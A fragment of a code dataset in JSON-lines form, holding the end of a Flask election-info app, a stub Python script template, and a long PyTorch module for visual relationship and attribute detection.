early_vote_sites:\n\t\tearly_vote_sites_list.append({'name': place['address']['locationName'], 'street_address': place['address']['line1'], 'city': place['address']['city'], 'state': place['address']['state'], 'zip': place['address']['zip']})\n\n\n\ttemplateData = {\n\t\t\t'screen_name' : '{} last 10 tweets'.format(screen_name),\n\t\t\t'user_tweets' : user_tweets,\n\t\t\t'pred' : pred,\n\t\t\t'election': election,\n\t\t\t'contest_type' : contest_type,\n\t\t\t'contest_office_federal' : contest_office_federal,\n\t\t\t'contest_office_state' : contest_office_state,\n\t\t\t'contest_office_local' : contest_office_local,\n\t\t\t'contest_candidates_federal' : contest_candidates_federal,\n\t\t\t'contest_candidates_state' : contest_candidates_state,\n\t\t\t'contest_candidates_local' : contest_candidates_local,\n\t\t\t'polling_places_list' : polling_places,\n\t\t\t'early_vote_sites_list' : early_vote_sites_list\n\t\t}\n\n\treturn flask.render_template(\"result.html\", **templateData)\n\n@app.route('/')\n\ndef main():\n\treturn flask.render_template(\"index.html\")\n\nif __name__ == '__main__':\n\tapp.debug=True\n\tapp.run()\n","sub_path":"New folder/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"613339321","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntemplate.py\nbla bla\n\nPatrick Simianer \nYYYY-MM-DD\n\"\"\"\n\nimport sys\n\n\ndef main():\n try:\n arg = sys.argv[1]\n except IndexError:\n sys.stderr.write('Usage: %s \\n'%sys.argv[0])\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"379410456","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport itertools\n\nimport numpy as np\nfrom torchvision.models.detection.transform import GeneralizedRCNNTransform\nfrom models.focal_loss import FocalLoss\n\nimport pdb\n\n\nclass RelationshipsModelBase(nn.Module):\n def __init__(self, dataset, rel_context='relation_box', use_labels=False):\n super().__init__()\n\n self.num_relationships = dataset.num_relationships()\n self.num_classes = dataset.num_classes()\n self.rel_context = rel_context\n self.use_labels = use_labels\n print('Use labels: {}'.format(use_labels))\n\n self.rel_class_loss_fn = nn.CrossEntropyLoss(ignore_index=0) # standard classification problem\n # self.rel_relationshipness_loss_fn = FocalLoss()\n self.rel_relationshipness_loss_fn = nn.BCEWithLogitsLoss()\n # self.rel_loss_fn = FocalLoss(num_classes=self.num_relationships, reduction='sum')\n self.cuda_on = False\n\n def bbox_union(self, boxes_perm, padding=0):\n x1, _ = torch.min(boxes_perm[:, :, [0, 4]], dim=2)\n y1, _ = torch.min(boxes_perm[:, :, [1, 5]], dim=2)\n x2, _ = torch.max(boxes_perm[:, :, [2, 6]], dim=2)\n y2, _ = torch.max(boxes_perm[:, :, [3, 7]], dim=2)\n # w = max(box1[0] + box1[2], box2[0] + box2[2]) - x\n # h = max(box1[1] + box1[3], box2[1] + box2[3]) - y\n out_box = torch.stack([x1 - padding, y1 - padding, x2 + padding, y2 + padding], dim=2)\n return out_box\n\n def spatial_features(self, boxes_perm):\n deltax = (boxes_perm[:, :, 0] - boxes_perm[:, :, 4]) / (boxes_perm[:, :, 6] - boxes_perm[:, :, 4])\n deltay = (boxes_perm[:, :, 1] - boxes_perm[:, :, 5]) / (boxes_perm[:, :, 7] - boxes_perm[:, :, 5])\n logw = torch.log((boxes_perm[:, :, 2] - boxes_perm[:, :, 0]) / (boxes_perm[:, :, 6] - boxes_perm[:, :, 4]))\n logh = torch.log((boxes_perm[:, :, 3] - boxes_perm[:, :, 1]) / (boxes_perm[:, :, 7] - boxes_perm[:, :, 5]))\n area1 = (boxes_perm[:, :, 2] - boxes_perm[:, :, 0]) * (boxes_perm[:, :, 3] - boxes_perm[:, :, 1])\n area2 = (boxes_perm[:, :, 6] - boxes_perm[:, :, 4]) * (boxes_perm[:, :, 7] - boxes_perm[:, :, 5])\n\n res = torch.stack([deltax, deltay, logw, logh, area1, area2], dim=2)\n return res\n\n def choose_rel_indexes(self, relationships):\n # get annotated relationships and their opposite (dog is under the table and table is NOT under the dog)\n a = relationships > 0\n #b = torch.transpose(a, 0, 1)\n chosen = a # + b\n\n # add some null random relationship to the set (30%)\n rand_matrix = torch.rand_like(relationships, dtype=torch.float)\n #c = rand_matrix < 0.3\n #chosen += c\n\n # add a random amount of null relationships\n rand_values = torch.randint(0, relationships.shape[0] ** 2, size=(torch.nonzero(relationships).shape[0],))\n d = torch.zeros_like(relationships)\n d = d.view(-1)\n d[rand_values] = 1\n d = d.view(relationships.shape[0], relationships.shape[1])\n chosen += d.byte()\n\n # make sure the diagonal is 0 (there are no relationships between an object and itself)\n '''not_diagonal = 1 - torch.eye(relationships.size(0))\n not_diagonal = not_diagonal.byte()\n if self.cuda_on:\n not_diagonal = not_diagonal.cuda()\n chosen = chosen * not_diagonal'''\n\n # at least one value should be 1 in order to avoid that the whole matrix is 0 (floating point exception happens)\n if torch.nonzero(relationships).shape[0] == 0:\n rawind = torch.argmax(rand_matrix)\n chosen[rawind // relationships.size(0), rawind % relationships.size(1)] = 1\n # print('WARNING! Images with zero relationships should not be here now.')\n\n return chosen > 0\n\n def forward(self, boxes, labels, targets, img_features, pooled_regions, img_shape, scale):\n # Infer the relationships between objects\n\n # Pseudo-code:\n # for every couple:\n # compute the union bounding box\n # pool this region in order to extract features\n # concat subj+label, rel, obj+label features\n # pass through the relationships classifier\n\n # 0. Compute the union bounding box and the spatial features\n obj_perm = boxes.unsqueeze(0).repeat(boxes.size(0), 1, 1) # K x K x 4\n subj_perm = boxes.unsqueeze(1).repeat(1, boxes.size(0), 1) # K x K x 4\n box1box2_perm = torch.cat((obj_perm, subj_perm), dim=2) # K x K x 8\n relboxes = self.bbox_union(box1box2_perm, padding=10) # K x K x 4\n box1relboxes_perm = torch.cat((obj_perm, relboxes), dim=2) # K x K x 8\n relboxesbox2_perm = torch.cat((relboxes, subj_perm), dim=2) # K x K x 8\n\n box1box2_perm_feats = self.spatial_features(box1box2_perm) # K x K x 4\n so_feats = box1box2_perm_feats[:, :, :-2] # K x K x 2, exclude areas\n area_boxes_over_img = box1box2_perm_feats[:, :, -2:] / (\n img_shape[0] * img_shape[1]) # take only the areas and normalize with respect to frame\n sp_feats = self.spatial_features(box1relboxes_perm)[:, :, :-2] # K x K x 4\n po_feats = self.spatial_features(relboxesbox2_perm)[:, :, :-2] # K x K x 4\n\n spatial_features = torch.cat([so_feats, sp_feats, po_feats, area_boxes_over_img], dim=2)\n\n # 1. Compute the union bounding box, only if rel_context is not None\n if self.rel_context == 'relation_box':\n # 2. Pool all the regions\n relboxes = relboxes.view(-1, 4)\n pooled_rel_regions = torchvision.ops.roi_align(img_features.unsqueeze(0), [relboxes], output_size=(4, 4),\n spatial_scale=scale) # K*K x 256 x 4 x 4\n # Prepare the relationship features for the concatenation\n pooled_rel_regions = pooled_rel_regions.view(boxes.size(0), boxes.size(0),\n pooled_rel_regions.size(1),\n pooled_rel_regions.size(2),\n pooled_rel_regions.size(3)) # K x K x 256 x 4 x 4\n elif self.rel_context == 'whole_image':\n raise NotImplementedError()\n # self.avgpool(img_features)\n # TODO!\n elif self.rel_context == 'image_level_labels':\n raise NotImplementedError()\n # TODO!\n else:\n pooled_rel_regions = None\n\n # Stack the subject and object features\n pooled_obj_regions = pooled_regions.unsqueeze(0).repeat(boxes.size(0), 1, 1, 1, 1) # K x K x 256 x 4 x 4\n pooled_subj_regions = pooled_regions.unsqueeze(1).repeat(1, boxes.size(0), 1, 1, 1) # K x K x 256 x 4 x 4\n pooled_subj_obj_regions = torch.cat((pooled_subj_regions, pooled_obj_regions), dim=2) # K x K x 512 x 4 x 4\n\n if self.use_labels:\n # Handle labels\n one_hot_obj_label = nn.functional.one_hot(labels, self.num_classes).float().unsqueeze(0).repeat(boxes.size(0),\n 1,\n 1) # K x K x num_classes\n one_hot_subj_label = nn.functional.one_hot(labels, self.num_classes).float().unsqueeze(1).repeat(1,\n boxes.size(0),\n 1) # K x K x num_classes\n one_hot_subj_obj_label = torch.cat((one_hot_subj_label, one_hot_obj_label), dim=2)\n else:\n one_hot_subj_obj_label = None\n\n if self.training:\n # If training, we suppress some of the relationships\n # Hence, calculate a filter in order to control the amount of relations and non-relations seen by the architecture.\n choosen_relation_indexes = self.choose_rel_indexes(targets['relationships'])\n else:\n choosen_relation_indexes = None\n\n # 4. Run the Relationship classifier\n rel_out = self.features_to_relationships(pooled_subj_obj_regions, spatial_features,\n one_hot_subj_obj_label, pooled_rel_regions,\n choosen_relation_indexes)\n if self.training:\n t = targets['relationships'][choosen_relation_indexes]\n rel_class_loss = self.rel_class_loss_fn(rel_out, t)\n rel_relationshipness_loss = self.rel_relationshipness_loss_fn(rel_out[:, 0], (t > 0).float())\n\n return rel_class_loss, rel_relationshipness_loss\n else:\n inferred_rels = F.softmax(rel_out[:, 1:], dim=1)\n _, rels_indexes = torch.max(inferred_rels, dim=1)\n rels_scores = torch.sigmoid(rel_out[:, 0]) # the relationshipness is considered as score\n\n # reshape back to a square matrix\n rels_scores = rels_scores.view(boxes.size(0), boxes.size(0))\n # put diagonal scores manually to 0 (object are not related to theirselves)\n mask = 1 - torch.eye(boxes.size(0))\n if self.cuda_on:\n mask = mask.cuda()\n rels_scores *= mask\n\n rels_indexes = rels_indexes.view(boxes.size(0), boxes.size(0))\n rels_indexes += 1 # since the index 0 is the null relationship\n\n return {'relationships': rels_indexes, 'relationships_scores': rels_scores}\n\n def features_to_relationships(self, pooled_subj_obj_regions, spatial_features,\n one_hot_subj_obj_label, pooled_rel_regions,\n choosen_relation_indexes):\n # Should be overridden by the extending classes\n raise NotImplementedError()\n\n def cuda(self, device=None):\n self.cuda_on = True\n return super().cuda(device)\n\n\nclass RelationshipsModelsSingleNet(RelationshipsModelBase):\n def __init__(self, dataset, rel_context='relation_box', use_labels=False):\n super().__init__(dataset, rel_context, use_labels)\n if rel_context == 'relation_box':\n input_size = 4 * 4 * 256 * 3 + 2 * self.num_classes * use_labels\n elif rel_context == 'whole_image':\n input_size = 4 * 4 * 256 * 3 + 2 * self.num_classes * use_labels\n elif rel_context == 'image_level_labels':\n input_size = 4 * 4 * 256 * 2 + 3 * self.num_classes * use_labels\n elif rel_context is None:\n input_size = 4 * 4 * 256 * 2 + 2 * self.num_classes * use_labels\n # add spatial feature\n input_size += 14\n self.relationships_classifier = nn.Sequential(\n nn.Linear(input_size, 4096),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(4096, self.num_relationships),\n )\n\n def features_to_relationships(self, pooled_subj_obj_regions, spatial_features, one_hot_subj_obj_label,\n pooled_rel_regions, choosen_idxs):\n # Prepare object features for concatenation\n pooled_subj_obj_regions.view(pooled_subj_obj_regions.size(0), pooled_subj_obj_regions.size(1), -1) # K x K x 512*4*4\n\n # Concatenate object regions and spatial features\n pooled_concat = torch.cat((pooled_subj_obj_regions, spatial_features), dim=2)\n\n # If needed, concatenate object labels\n if self.use_labels:\n pooled_concat = torch.cat((pooled_concat, one_hot_subj_obj_label), dim=2)\n\n # If needed, concatenate the feature regarding the relationship context\n if self.rel_context is not None:\n # First, prepare the relationship features for the concatenation\n pooled_rel_regions = pooled_rel_regions.view(pooled_rel_regions.size(0), pooled_rel_regions.size(0), -1) # K x K x 256*4*4\n pooled_concat = torch.cat((pooled_concat, pooled_rel_regions), dim=2)\n\n if self.training:\n # If training, we suppress some of the relationships\n # Hence, calculate a filter in order to control the amount of relations and non-relations seen by the architecture.\n pooled_concat = pooled_concat[choosen_idxs]\n else:\n # Reshape for passing through the classifier\n pooled_concat = pooled_concat.view(pooled_concat.size(0) ** 2, -1)\n\n # 4. Run the Relationship classifier\n rel_out = self.relationships_classifier(pooled_concat)\n return rel_out\n\n\nclass RelationshipsModelsMultipleNets(RelationshipsModelBase):\n def __init__(self, dataset, rel_context='relation_box', use_labels=False):\n super().__init__(dataset, rel_context, use_labels)\n if rel_context == 'relation_box':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Conv2d(512, 1024, 2, stride=1),\n nn.BatchNorm2d(1024),\n nn.ReLU(),\n nn.Conv2d(1024, 1024, 1),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'whole_image':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'image_level_labels':\n raise NotImplementedError\n elif rel_context is None:\n self.context_net = None\n\n self.spatial_net = nn.Sequential(\n nn.Linear(14, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n self.objects_convnet = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n if use_labels:\n self.labels_net = nn.Sequential(\n nn.Linear(2 * self.num_classes, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n # final classifier\n input = 256 + 512*4 * 2 # spatial features + objects\n if use_labels:\n input += 256\n if rel_context == 'relation_box' or rel_context == 'whole_image':\n input += 1024*4\n self.final_classifier = nn.Sequential(\n nn.Linear(input, 4096),\n nn.ReLU(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Linear(4096, self.num_relationships),\n )\n\n def features_to_relationships(self, pooled_subj_obj_regions, spatial_features, one_hot_subj_obj_label,\n pooled_rel_regions, choosen_idxs):\n if self.training:\n # Filter training examples\n\n pooled_subj_obj_regions = pooled_subj_obj_regions[choosen_idxs]\n spatial_features = spatial_features[choosen_idxs]\n if self.use_labels:\n one_hot_subj_obj_label = one_hot_subj_obj_label[choosen_idxs]\n if self.rel_context is not None:\n pooled_rel_regions = pooled_rel_regions[choosen_idxs]\n else:\n # Reshape these tensors in order to pass through the net\n pooled_subj_obj_regions = pooled_subj_obj_regions.view(-1, pooled_subj_obj_regions.size(2),\n pooled_subj_obj_regions.size(3),\n pooled_subj_obj_regions.size(4))\n spatial_features = spatial_features.view(-1, spatial_features.size(2))\n if self.use_labels:\n one_hot_subj_obj_label = one_hot_subj_obj_label.view(-1, one_hot_subj_obj_label.size(2))\n if self.rel_context is not None:\n pooled_rel_regions = pooled_rel_regions.view(-1, pooled_rel_regions.size(2),\n pooled_rel_regions.size(3),\n pooled_rel_regions.size(4))\n\n # Forward through the net\n p_spatial = self.spatial_net(spatial_features)\n\n p_subj = self.objects_convnet(pooled_subj_obj_regions[:, :256, :, :])\n p_subj = p_subj.view(p_subj.size(0), -1) # flatten\n\n p_obj = self.objects_convnet(pooled_subj_obj_regions[:, 256:, :, :])\n p_obj = p_obj.view(p_obj.size(0), -1) # flatten\n\n concat = torch.cat((p_subj, p_obj, p_spatial), dim=1)\n if self.use_labels:\n # Forward the label net\n p_labels = self.labels_net(one_hot_subj_obj_label)\n concat = torch.cat((concat, p_labels), dim=1)\n\n if self.rel_context is not None:\n # Forward the context network\n p_context = self.context_net(pooled_rel_regions)\n p_context = p_context.view(p_context.size(0), -1)\n concat = torch.cat((concat, p_context), dim=1)\n\n rel_out = self.final_classifier(concat)\n return rel_out\n\n\nclass RelationshipsModelSumOfProbabilities(RelationshipsModelBase):\n def __init__(self, dataset, rel_context='relation_box', use_labels=False):\n super().__init__(dataset, rel_context, use_labels)\n if rel_context == 'relation_box':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Conv2d(512, 512, 2, stride=1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'whole_image':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'image_level_labels':\n raise NotImplementedError\n elif rel_context is None:\n self.context_net = None\n\n self.spatial_net = nn.Sequential(\n nn.Linear(14, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, self.num_relationships)\n )\n\n if use_labels:\n self.labels_net = nn.Sequential(\n nn.Linear(2 * self.num_classes, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, self.num_relationships)\n )\n\n self.visual_objects_classifier = nn.Sequential(\n nn.Linear(256 * 4, 1024),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(1024, 1024),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(1024, self.num_relationships)\n )\n\n self.visual_relationships_classifier = nn.Sequential(\n nn.Linear(256 * 4 * 2 + 512 * 4, 2048),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(2048, 2048),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(2048, self.num_relationships)\n )\n\n # final classifier\n '''input = 256 + 1024 # spatial features + objects\n if use_labels:\n input += 256\n if rel_context == 'relation_box' or rel_context == 'whole_image':\n input += 512\n self.final_classifier = nn.Sequential(\n nn.Linear(input, 4096),\n nn.ReLU(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Linear(4096, self.num_relationships),\n )'''\n\n def features_to_relationships(self, pooled_subj_obj_regions, spatial_features, one_hot_subj_obj_label,\n pooled_rel_regions, choosen_idxs):\n if self.training:\n # Filter training examples\n\n pooled_subj_obj_regions = pooled_subj_obj_regions[choosen_idxs]\n spatial_features = spatial_features[choosen_idxs]\n if self.use_labels:\n one_hot_subj_obj_label = one_hot_subj_obj_label[choosen_idxs]\n if self.rel_context is not None:\n pooled_rel_regions = pooled_rel_regions[choosen_idxs]\n else:\n # Reshape these tensors in order to pass through the net\n pooled_subj_obj_regions = pooled_subj_obj_regions.view(-1, pooled_subj_obj_regions.size(2),\n pooled_subj_obj_regions.size(3),\n pooled_subj_obj_regions.size(4))\n spatial_features = spatial_features.view(-1, spatial_features.size(2))\n if self.use_labels:\n one_hot_subj_obj_label = one_hot_subj_obj_label.view(-1, one_hot_subj_obj_label.size(2))\n if self.rel_context is not None:\n pooled_rel_regions = pooled_rel_regions.view(-1, pooled_rel_regions.size(2),\n pooled_rel_regions.size(3),\n pooled_rel_regions.size(4))\n\n # Forward through the net\n class_spatial = self.spatial_net(spatial_features)\n\n p_subj = F.avg_pool2d(pooled_subj_obj_regions[:, :256, :, :], 2, stride=2)\n p_subj = p_subj.view(p_subj.size(0), -1) # flatten\n\n p_obj = F.avg_pool2d(pooled_subj_obj_regions[:, 256:, :, :], 2, stride=2)\n p_obj = p_obj.view(p_obj.size(0), -1) # flatten\n\n class_subj = self.visual_objects_classifier(p_subj)\n class_obj = self.visual_objects_classifier(p_obj)\n\n p_context = self.context_net(pooled_rel_regions)\n p_context = p_context.view(p_context.size(0), -1) # flatten\n\n concat = torch.cat((p_subj, p_obj, p_context), dim=1)\n class_rel = self.visual_relationships_classifier(concat)\n\n class_labels = self.labels_net(one_hot_subj_obj_label)\n\n final = torch.stack((class_subj, class_obj, class_rel, class_labels, class_spatial), dim=0).sum(dim=0)\n return final\n\n\nclass DRNet(nn.Module):\n def __init__(self, obj_feats, rel_feats, num_rels, num_objs, iters=5):\n super().__init__()\n self.w_a = nn.Linear(obj_feats, num_objs)\n self.w_r = nn.Linear(rel_feats, num_rels)\n\n self.w_sr = nn.Linear(num_rels, num_objs)\n self.w_so = nn.Linear(num_objs, num_objs)\n\n self.w_rs = nn.Linear(num_objs, num_rels)\n self.w_ro = nn.Linear(num_objs, num_rels)\n\n self.w_os = nn.Linear(num_objs, num_objs)\n self.w_or = nn.Linear(num_rels, num_objs)\n\n self.num_rels = num_rels\n self.num_objs = num_objs\n self.iters = iters\n self.cuda_on = False\n\n def forward(self, xs, xo, xr):\n qs = torch.zeros((xs.shape[0], self.num_objs), requires_grad=True)\n qo = torch.zeros((xo.shape[0], self.num_objs), requires_grad=True)\n qr = torch.zeros((xr.shape[0], self.num_rels), requires_grad=True)\n if self.cuda_on:\n qs, qo, qr = qs.cuda(), qo.cuda(), qr.cuda()\n for i in range(self.iters):\n qs_out = torch.stack((self.w_a(xs), self.w_sr(qr), self.w_so(qo)), dim=0).sum(dim=0)\n qr_out = torch.stack((self.w_r(xr), self.w_rs(qs), self.w_ro(qo)), dim=0).sum(dim=0)\n qo_out = torch.stack((self.w_a(xo), self.w_os(qs), self.w_or(qr)), dim=0).sum(dim=0)\n qs = F.relu(qs_out)\n if i != self.iters - 1:\n qr = F.relu(qr_out)\n else:\n qr = qr_out\n qo = F.relu(qo_out)\n\n return qr\n\n def cuda(self, device=None):\n self.cuda_on = True\n return super().cuda(device)\n\n\nclass RelationshipsModelDRNet(RelationshipsModelBase):\n def __init__(self, dataset, rel_context='relation_box', use_labels=False):\n super().__init__(dataset, rel_context, use_labels)\n\n assert rel_context is not None, \"Relation context is needed in DRNet\"\n if rel_context == 'relation_box':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'whole_image':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'image_level_labels':\n raise NotImplementedError\n\n self.spatial_net = nn.Sequential(\n nn.Linear(14, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n self.objects_convnet = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n self.objects_labels_net = nn.Sequential(\n nn.Linear(self.num_classes + 512, 1024),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(1024, 1024),\n nn.ReLU(),\n )\n\n self.context_spatial_net = nn.Sequential(\n nn.Linear(256 + 512, 1024),\n nn.ReLU(),\n nn.Linear(1024, 1024),\n nn.ReLU(),\n )\n\n #self.obj_project = nn.Linear(1024, self.num_classes)\n #self.rel_project = nn.Linear(1024, self.num_relationships)\n self.dr_net = DRNet(obj_feats=1024, rel_feats=1024, num_rels=self.num_relationships, num_objs=self.num_classes)\n\n def features_to_relationships(self, pooled_subj_obj_regions, spatial_features, one_hot_subj_obj_label,\n pooled_rel_regions, choosen_idxs):\n if self.training:\n # Filter training examples\n\n pooled_subj_obj_regions = pooled_subj_obj_regions[choosen_idxs]\n spatial_features = spatial_features[choosen_idxs]\n one_hot_subj_obj_label = one_hot_subj_obj_label[choosen_idxs]\n pooled_rel_regions = pooled_rel_regions[choosen_idxs]\n else:\n # Reshape these tensors in order to pass through the net\n pooled_subj_obj_regions = pooled_subj_obj_regions.view(-1, pooled_subj_obj_regions.size(2),\n pooled_subj_obj_regions.size(3),\n pooled_subj_obj_regions.size(4))\n spatial_features = spatial_features.view(-1, spatial_features.size(2))\n one_hot_subj_obj_label = one_hot_subj_obj_label.view(-1, one_hot_subj_obj_label.size(2))\n pooled_rel_regions = pooled_rel_regions.view(-1, pooled_rel_regions.size(2),\n pooled_rel_regions.size(3),\n pooled_rel_regions.size(4))\n\n # Forward through the net\n\n p_subj = self.objects_convnet(pooled_subj_obj_regions[:, :256, :, :])\n p_subj = p_subj.mean(dim=(2, 3)) # global average pooling\n p_subj = torch.cat((p_subj, one_hot_subj_obj_label[:, :self.num_classes]), dim=1)\n\n p_obj = self.objects_convnet(pooled_subj_obj_regions[:, 256:, :, :])\n p_obj = p_obj.mean(dim=(2, 3)) # global average pooling\n p_obj = torch.cat((p_obj, one_hot_subj_obj_label[:, self.num_classes:]), dim=1)\n\n # Prepare the aggregated features (spatial - context for relationships and visual - label for objects)\n p_context = self.context_net(pooled_rel_regions)\n p_context = p_context.mean(dim=(2, 3))\n p_spatial = self.spatial_net(spatial_features)\n\n p_rel = torch.cat((p_context, p_spatial), dim=1)\n p_rel = self.context_spatial_net(p_rel)\n p_obj = self.objects_labels_net(p_obj)\n p_subj = self.objects_labels_net(p_subj)\n\n # Forward the DRNet\n #p_obj = F.softmax(self.obj_project(p_obj), dim=1)\n #p_subj = F.softmax(self.obj_project(p_subj), dim=1)\n #p_rel = F.softmax(self.rel_project(p_rel), dim=1)\n rel_out = self.dr_net(p_subj, p_obj, p_rel)\n\n return rel_out\n\n def cuda(self, device=None):\n self.dr_net.cuda()\n return super().cuda(device)\n\n\nclass AttributesModelBase(nn.Module):\n def __init__(self, dataset):\n super().__init__()\n self.num_attributes = dataset.num_attributes()\n self.num_classes = dataset.num_classes()\n self.attr_loss_fn = nn.MultiLabelSoftMarginLoss() # multi-label classification problem\n self.avgpool = nn.AdaptiveAvgPool2d((4, 4))\n\n def forward(self, boxes, labels, targets, img_features, pooled_regions):\n # Infer the attributes for every object in the images\n\n one_hot_label = nn.functional.one_hot(labels, self.num_classes)\n\n # 2. Run the multi-label classifier\n attr_out = self.features_to_attributes(img_features, pooled_regions, one_hot_label)\n if self.training:\n attr_loss = self.attr_loss_fn(attr_out, targets['attributes'].float())\n return attr_loss\n else:\n inferred_attr = torch.sigmoid(attr_out)\n attr_scores, attr_indexes = torch.sort(inferred_attr, dim=1, descending=True)\n return {'attributes': attr_indexes, 'attributes_scores': attr_scores}\n\n def features_to_attributes(self, img_features, pooled_regions, one_hot_label):\n raise NotImplementedError\n\n\nclass AttributesModelSingleNet(AttributesModelBase):\n def __init__(self, dataset):\n super().__init__(dataset)\n self.attributes_classifier = nn.Sequential(\n nn.Linear(4 * 4 * 256 + self.num_classes, 4096),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(4096, self.num_attributes),\n )\n\n def features_to_attributes(self, img_features, pooled_regions, one_hot_label):\n # Compute global image features\n # img_features_pooled = self.avgpool(img_features)\n # 1. Concatenate image_features, pooled_regions and labels\n attr_features = torch.cat(\n (\n pooled_regions.view(pooled_regions.size(0), -1), # K x (256*4*4)\n # img_features_pooled.view(-1).unsqueeze(0).expand(img_features_pooled.size(0), -1),\n # concatenate image level features to all the regions K x (256*4*4)\n one_hot_label.float() # K x num_classes\n ),\n dim=1\n )\n out = self.attributes_classifier(attr_features) # K x num_attr\n return out\n\n\nclass AttributesModelMultipleNets(AttributesModelBase):\n def __init__(self, dataset):\n super().__init__(dataset)\n self.final_classifier = nn.Sequential(\n nn.Linear(512 * 4 + 256, 4096),\n nn.ReLU(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Linear(4096, self.num_attributes),\n )\n\n self.labels_net = nn.Sequential(\n nn.Linear(self.num_classes, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n self.objects_convnet = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n def features_to_attributes(self, img_features, pooled_regions, one_hot_label):\n # Process labels\n p_label = self.labels_net(one_hot_label.float())\n\n p_objects = self.objects_convnet(pooled_regions)\n p_objects = p_objects.view(p_objects.size(0), -1)\n\n concat = torch.cat((p_label, p_objects), dim=1)\n\n out = self.final_classifier(concat) # K x num_attr\n return out\n\n\nclass VRD(nn.Module):\n def __init__(self, detector, dataset, finetune_detector=False, train_relationships=True,\n train_attributes=True, rel_context='relation_box', use_labels=True, max_objects=80, lam=1):\n super(VRD, self).__init__()\n\n # asserts\n assert train_relationships or train_attributes, \"You have to train one of relationships or attributes!\"\n assert not (rel_context is None and train_relationships), \"You have to specify a valid rel_context!\"\n\n self.detector = detector.module if isinstance(detector, nn.DataParallel) else detector\n self.cuda_on = False\n self.num_classes = dataset.num_classes()\n self.finetune_detector = finetune_detector\n self.rel_context = rel_context\n self.train_relationships = train_relationships\n self.train_attributes = train_attributes\n self.max_objects = max_objects\n self.lam = lam\n\n self.relationships_net = RelationshipsModelsMultipleNets(dataset, rel_context, use_labels) if train_relationships else None\n self.attributes_net = AttributesModelMultipleNets(dataset) if train_attributes else None\n\n def train(self, mode=True):\n self.detector.train(mode)\n return super().train(mode)\n\n def eval(self):\n self.detector.eval()\n return super().eval()\n\n def forward(self, images, targets=None):\n if self.training and targets is None:\n raise ValueError(\"In training mode, targets should be passed\")\n\n losses_dict = {}\n vrd_detections = []\n\n if self.training:\n # train pass in the detector, if we want\n if self.finetune_detector:\n det_loss = self.detector(images, targets)\n losses_dict.update(det_loss)\n\n # transform images and targets to match the ones processed by the detector\n images, targets = self.detector.transform(images, targets)\n\n # objects from every batch\n boxes = [t['boxes'] for t in targets]\n labels = [t['labels'] for t in targets] # labels from every batch\n else:\n # forward through the object detector in order to retrieve objects from the image\n detections = self.detector(images)\n boxes = [d['boxes'] for d in detections]\n labels = [d['labels'] for d in detections]\n\n # transform images and targets to match the ones processed by the detector\n images, targets = self.detector.transform(images, targets)\n\n image_features = self.detector.backbone(images.tensors)[3]\n\n if not self.finetune_detector:\n # detach the features from the graph so that we do not backprop through the detector\n image_features = image_features.detach().clone()\n\n # iterate through batch size\n attr_loss = 0\n rel_class_loss = 0\n rel_relationshipness_loss = 0\n for idx, (img, img_f, b, l) in enumerate(zip(images.tensors, 